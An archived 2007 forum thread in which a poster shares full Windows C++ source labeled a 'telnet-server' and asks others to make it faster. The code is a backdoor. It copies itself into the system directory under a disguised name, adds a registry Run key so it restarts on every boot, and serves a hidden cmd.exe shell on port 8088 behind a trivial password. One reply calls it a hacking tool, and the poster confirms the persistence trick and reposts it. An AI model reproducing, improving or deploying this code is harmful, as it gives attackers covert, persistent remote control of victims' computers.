Home....
Developer Network >> Visual C++ & C++ Programming >> Network Programming

who is interest to optimize the follow code?(telnet-server code)

who is interest to optimize the follow code?
It's a sample telnet-server programm, intact,but run with low efficiency.

#include "stdafx.h"
#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#include "stdlib.h"
#pragma comment(lib,"ws2_32.lib")

#define password "x"
BOOL reg(char *szExecFile);

int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
GetModuleFileName(NULL,__argv[0],MAX_PATH);
char szNewPlace[MAX_PATH];
GetSystemDirectory(szNewPlace,MAX_PATH);

strcat(szNewPlace,"\\rundlls32.exe");
if( strcmp(__argv[0],szNewPlace) != 0 )
{CopyFile(__argv[0],szNewPlace,FALSE);}
if(!reg(szNewPlace))
{return 0;}

WSADATA wsaData;
char buff[4096];
int retval;
if ((retval = WSAStartup(MAKEWORD(2,2), &wsaData)) != 0)
{
printf("WSAStartup failed: %d\n",retval);
return -1;
}
int port=8088;
int bindServer,getClient;
struct sockaddr_in addrServer,addrClient;
char *MSG="\n\r Welcome ,Hack";
char *getpass="\r\n You Password:";
char *passok="\r\n ok!";
char *error="\r\n Error Password:";
bindServer=socket(AF_INET,SOCK_STREAM,0);
addrServer.sin_family=AF_INET;
addrServer.sin_port=htons(port);
addrServer.sin_addr.s_addr=ADDR_ANY;
int TimeOut=50000;
setsockopt(bindServer,SOL_SOCKET,SO_RCVTIMEO,(char*)&TimeOut,sizeof(TimeOut));
UINT bReUser=1;
setsockopt(bindServer,SOL_SOCKET,SO_REUSEADDR,(char*)&bReUser,sizeof(bReUser));
bind(bindServer,(struct sockaddr*)&addrServer,sizeof(addrServer));
listen(bindServer,5);
//printf("Bind Server is OK\n%d",port);

int iLen=sizeof(addrClient);
getClient=accept(bindServer,(struct sockaddr*)&addrClient,&iLen);
if (getClient != INVALID_SOCKET)
{
int iTimeOut=50000;
setsockopt(getClient,SOL_SOCKET,SO_RCVTIMEO,(char*)&iTimeOut,sizeof(iTimeOut));
}
else return -1;


send(getClient,MSG,strlen(MSG),0);
send(getClient,getpass,strlen(getpass),0);
recv(getClient,buff,1024,0);
if(!(strstr(buff,password)))
{
send(getClient, error, strlen(error), 0);
printf("\r\n PassWord ERROR!");
closesocket(getClient);
}
send(getClient, passok, strlen(passok), 0);
HANDLE hReadPipe1,hWritePipe1,hReadPipe2,hWritePipe2;
unsigned long lBytesRead;
SECURITY_ATTRIBUTES sa;
sa.nLength=0x0c;
sa.lpSecurityDescriptor=NULL;
sa.bInheritHandle=TRUE;
CreatePipe(&hReadPipe1,&hWritePipe1,&sa,0);
CreatePipe(&hReadPipe2,&hWritePipe2,&sa,0);
STARTUPINFO siinfo;
char cmdLine[256];
GetSystemDirectory(cmdLine,MAX_PATH+1);
strcat(cmdLine,"\\cmd.exe");
ZeroMemory(&siinfo,sizeof(siinfo));
siinfo.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
siinfo.wShowWindow = SW_HIDE;
siinfo.hStdInput = hReadPipe2;
siinfo.hStdOutput = siinfo.hStdError = hWritePipe1;

PROCESS_INFORMATION ProcessInformation;
int bread = CreateProcess(cmdLine,NULL,NULL,NULL,1,0,NULL,NULL,&siinfo,&ProcessInformation);
while(1)
{
int ret = PeekNamedPipe(hReadPipe1,buff,1024,&lBytesRead,0,0);
if(lBytesRead)
{
ret = ReadFile(hReadPipe1,buff,lBytesRead,&lBytesRead,0);
if(!ret) break;
ret = send(getClient,buff,lBytesRead,0);
if(ret <= 0) break;
}
else
{

lBytesRead = recv(getClient,buff,1024,0);
if((signed int)lBytesRead <= 0) break;
ret = WriteFile(hWritePipe2,buff,lBytesRead,&lBytesRead,0);
}
}

closesocket(getClient);
closesocket(bindServer);


return 0;


}

BOOL reg(char *szExecFile)
{
HKEY hKEY;
LPCTSTR data_Set="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\";
long ret0=(::RegOpenKeyEx(HKEY_LOCAL_MACHINE, data_Set, 0, KEY_ALL_ACCESS,&hKEY));
if(ret0!=ERROR_SUCCESS) {return(false);}
LPBYTE username_Get=(unsigned char*)malloc(sizeof(BYTE)*80);
DWORD cbData_1=80;
DWORD dwType;
long ret1=::RegQueryValueEx(hKEY,"Dll_Hostm", 0,&dwType, username_Get,&cbData_1);
if(ret1!=ERROR_SUCCESS)
{
DWORD setsize;
setsize=strlen(szExecFile)+1;
dwType=REG_SZ;
long ret9=::RegSetValueEx(hKEY,"RunDll32s", 0, dwType, (const unsigned char*) szExecFile, setsize);
if(ret9!=ERROR_SUCCESS) {return(false);}
}
free(username_Get);
::RegCloseKey(hKEY);
return(true);

}
[5106 byte] By [mazleagle] at [2007-11-19 20:44:36]
«« why it take a much time when copy a large file in USB
»» Open image file
# 1 Re: who is interest to optimize the follow code?(telnet-server code)
[ Redirected thread ]

NOTE: Maybe now, after I have added [code] tags somebody is interested.
Please take a look at vB Code List ( http://www.dev-archive.com/forum/misc.php?do=bbcode).
ovidiucucu at 2007-11-9 13:52:38 >
# 2 Re: who is interest to optimize the follow code?(telnet-server code)
NOTE: Maybe now, after I have added [code] tags somebody is interested.
Doubtful. It looks like a hacking tool that lets an attacker run an arbitrary program on the victim's machine, and thereafter send results back out over the Internet.

It also seems to add an entry to itself into the "Run" registry so that it runs automatically every time the victim re-boots.

Mike
MikeAThon at 2007-11-9 13:53:38 >
# 3 Re: who is interest to optimize the follow code?(telnet-server code)
BOOL reg(char *szExecFile)
{
HKEY hKEY;
LPCTSTR data_Set="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\";
long ret0=(::RegOpenKeyEx(HKEY_LOCAL_MACHINE, data_Set, 0, KEY_ALL_ACCESS,&hKEY));
if(ret0!=ERROR_SUCCESS) {return(false);}
LPBYTE username_Get=(unsigned char*)malloc(sizeof(BYTE)*80);
DWORD cbData_1=80;
DWORD dwType;
long ret1=::RegQueryValueEx(hKEY,"Dll_Hostm", 0,&dwType, username_Get,&cbData_1);
if(ret1!=ERROR_SUCCESS)
{
DWORD setsize;
setsize=strlen(szExecFile)+1;
dwType=REG_SZ;
long ret9=::RegSetValueEx(hKEY,"RunDll32s", 0, dwType, (const unsigned char*) szExecFile, setsize);
if(ret9!=ERROR_SUCCESS) {return(false);}
}
free(username_Get);
::RegCloseKey(hKEY);
return(true);

}

yeh, just you understand ,It also seems to add an entry to itself into the "Run" registry so that it runs automatically every time the victim re-boots.
mazleagle at 2007-11-9 13:54:48 >
Visual C++ & C++ Programming
Network Programming

Visual C++ & C++ Programming

All Classified

Visual C++ & C++ Programming New Topic

Visual C++ & C++ Programming Hot Topic